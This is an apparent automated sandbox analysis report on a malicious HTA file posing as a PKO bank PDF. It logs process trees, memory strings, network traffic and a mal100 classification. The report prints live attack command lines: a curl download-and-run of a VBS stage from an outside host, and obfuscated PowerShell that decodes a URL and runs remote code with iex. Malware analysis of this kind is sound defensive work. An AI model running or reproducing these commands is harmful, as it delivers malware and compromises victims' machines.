          Source: mshta.exe, 00000000.00000002.1842663260.0000000005E4D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1839442231.0000000005E4B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1834157948.0000000005E4B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1834220338.0000000005E4B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1833194096.0000000005E4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbss
          Source: mshta.exe, 00000000.00000002.1841794584.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.htaString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/js/676198543e135.js
          Source: mshta.exe, 00000000.00000003.1838231650.0000000002B6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/676198543e20a/js/676198543e135.js3
          Source: wscript.exe, 00000007.00000002.1899271460.0000000000658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/:
          Source: mshta.exe, 00000000.00000003.1838231650.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1840152370.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841794584.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1909848462.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1912407424.0000000002DF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1914670320.0000000002DF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/O
          Source: mshta.exe, 00000000.00000003.1838231650.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1840152370.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841794584.0000000002B6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/P
          Source: wscript.exe, wscript.exe, 0000000A.00000003.1911549070.0000000005043000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1914474150.0000000002DA4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1910556458.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1914733283.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1911863015.0000000002DA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1909848462.0000000002D99000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1911774958.0000000002D9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/js/pmxdhq.txt
          Source: wscript.exe, 0000000A.00000003.1911549070.0000000005043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/js/pmxdhq.txt0#vF~
          Source: wscript.exe, 0000000A.00000002.1914474150.0000000002DA4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1910556458.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1911863015.0000000002DA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1909848462.0000000002D99000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1911774958.0000000002D9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/js/pmxdhq.txtd
          Source: wscript.exe, 00000007.00000003.1895860613.0000000004CE3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.1901053777.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1893884972.00000000006B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/js/riodfc.txt
          Source: wscript.exe, 00000007.00000003.1894254003.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895012733.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.1899786645.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895382763.00000000006C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1893884972.00000000006B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/js/riodfc.txtYqH
          Source: wscript.exe, 00000007.00000003.1895437106.000000000070B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1894254003.000000000070B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.1900594503.000000000070B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/jsc.js
          Source: wscript.exe, 0000000A.00000003.1909848462.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1912407424.0000000002DF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1914670320.0000000002DF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/jsq.js
          Source: wscript.exe, 0000000A.00000002.1914733283.0000000002F30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/list_files.p
          Source: wscript.exe, 00000007.00000002.1901053777.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/list_files.pM
          Source: wscript.exe, wscript.exe, 0000000A.00000002.1914474150.0000000002DA4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1909848462.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1910556458.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1912407424.0000000002DF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1914670320.0000000002DF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1914733283.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1911863015.0000000002DA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1909848462.0000000002D99000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1911774958.0000000002D9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/list_files.php
          Source: wscript.exe, 0000000A.00000003.1909848462.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1912407424.0000000002DF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1914670320.0000000002DF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/list_files.phpe
          Source: wscript.exe, 00000007.00000003.1894254003.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895012733.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.1899786645.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895382763.00000000006C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1893884972.00000000006B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pko-download.kagyouth.co.ke/list_files.phpitX
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
          Source: powershell.exe, 00000011.00000002.2002991318.000001590052D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holid
          Source: powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-20
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-202
          Source: powershell.exe, 00000011.00000002.2002991318.0000015900FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gif
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifX
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-202gin
          Source: powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-20Type0
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
          Source: powershell.exe, 00000011.00000002.2002991318.0000015900615000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159101D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159102FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: powershell.exe, 00000011.00000002.2002991318.0000015900615000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
          Source: powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownHTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.4:49737 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.4:49740 version: TLS 1.2

          System Summary

          barindex
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B7E201D17_2_00007FFD9B7E201D
          Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winHTA@28/15@4/4
          Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\676198543e135[1].jsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5224:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_03
          Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\riodfc.jsJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta"
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbs
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs"
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbs
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs"
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\riodfc.js
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\pmxdhq.js
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\System32\conhost.exe conhost --headless powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp)
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp)
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\System32\conhost.exe conhost --headless powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv)
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv)
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbsJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbsJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbsJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbsJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\riodfc.jsJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\pmxdhq.js
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp)Jump to behavior
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv)Jump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
